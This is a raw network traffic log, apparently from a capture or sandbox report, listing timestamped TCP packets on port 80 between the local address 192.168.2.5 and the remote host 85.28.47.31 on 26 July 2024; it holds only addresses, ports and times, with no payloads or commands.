Jul 26, 2024 17:56:15.157854080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158039093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158050060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158060074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158071995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158081055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158082962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158092976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158104897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158116102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158118010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158128023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158137083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158142090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158150911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158153057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158173084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158194065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158371925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158384085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158416033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158426046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158492088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158503056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158514023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158524990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158533096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158535957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158546925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158555031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158559084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158571005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158581018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158585072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158597946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.158608913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158622026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.158653975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159049034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159060001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159069061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159080029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159090996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159096956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159101009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159111977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159123898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159130096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159135103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159146070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159161091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159162998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159171104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159182072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159183979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159193993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159210920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159231901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159384966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159403086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159413099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159424067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159442902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159465075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159539938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159552097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159563065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159574986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159585953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159588099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159595966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159606934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159616947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159617901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159641027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159665108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159673929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159684896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159694910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159706116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159715891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159717083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159729004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159739971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159749985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159755945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159755945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159760952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159775019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159785986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159786940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.159813881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.159835100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.160106897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.160118103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.160157919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.160226107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.160235882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.160247087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.160259962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.160269022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.160271883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.160285950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.160300016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.160304070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.160325050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.160346031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.261243105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.261259079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.261270046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.261281967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.261389017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.262197018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.262214899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.262232065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.262249947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.262258053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.262265921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.262284994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.262321949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.262356043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.263170004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.263189077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.263206005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.263222933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.263223886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.263241053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.263257980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.263286114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.264134884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.264152050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.264168978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.264184952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.264185905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.264204025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.264214993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.264219999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.264245987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.264266968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.265114069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.265131950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.265149117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.265166044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.265170097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.265182972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.265192032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.265201092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.265228987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.265250921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.266087055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.266104937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.266120911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.266139030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.266148090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.266156912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.266180992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.266201019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.267039061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.267056942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.267074108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.267096043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.267102003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.267112970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.267119884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.267132998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.267148972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.267152071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.267180920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.267211914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.268032074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.268049955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.268065929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.268084049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.268086910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.268100977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.268109083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.268143892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.268963099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.268980980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.268997908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.269015074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.269018888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.269030094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.269049883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.269051075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.269084930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.269928932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.269947052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.269964933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.269982100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.269984961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.269999981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.270019054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.270047903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.270945072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.270966053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.270982027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.270998955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.270998955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.271017075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.271030903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.271034956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.271064043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.271085024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.271871090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.271888971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.271907091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.271923065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.271929979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.271939993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.271950006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.271986008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.272852898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.272871017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.272887945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.272911072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.272937059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.272955894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.272968054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.272969961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.272990942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.273020983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.273766041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.273783922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.273799896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.273827076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.273833990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.273847103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.273864031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.273864031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.273890972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.273910046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.274771929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.274791002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.274806023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.274825096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.274826050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.274841070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.274852037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.274857998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.274883986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.274904013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.275743008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.275760889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.275779009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.275795937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.275796890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.275811911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.275823116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.275855064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.276721001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.276738882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.276755095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.276772022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.276777029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.276789904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.276807070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.276809931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.276838064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.276866913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.277626038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.277645111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.277672052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.277681112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.277689934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.277698040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.277705908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.277719975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.277724028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.277749062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.277776957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.278647900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.278665066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.278682947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.278698921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.278700113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.278716087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.278727055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.278757095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.279637098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.279654026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.279668093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.279690027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.279721022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.335059881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335130930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335143089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335203886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.335270882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.335432053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335443020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335454941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335467100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335484982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.335508108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.335900068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335911989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335927963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335942030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335953951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335957050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.335967064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335978031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.335980892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.336014032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.336028099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.336863995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.336874962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.336884975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.336896896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.336909056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.336920977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.336924076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.336931944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.336944103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.336952925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.336981058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.337838888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.337852001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.337865114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.337876081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.337887049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.337898016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.337908030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.337908983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.337918997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.337930918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.337969065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.339307070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339318991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339329004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339342117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339353085 CEST	80	49704	85.28.47.31	192.168.2.5
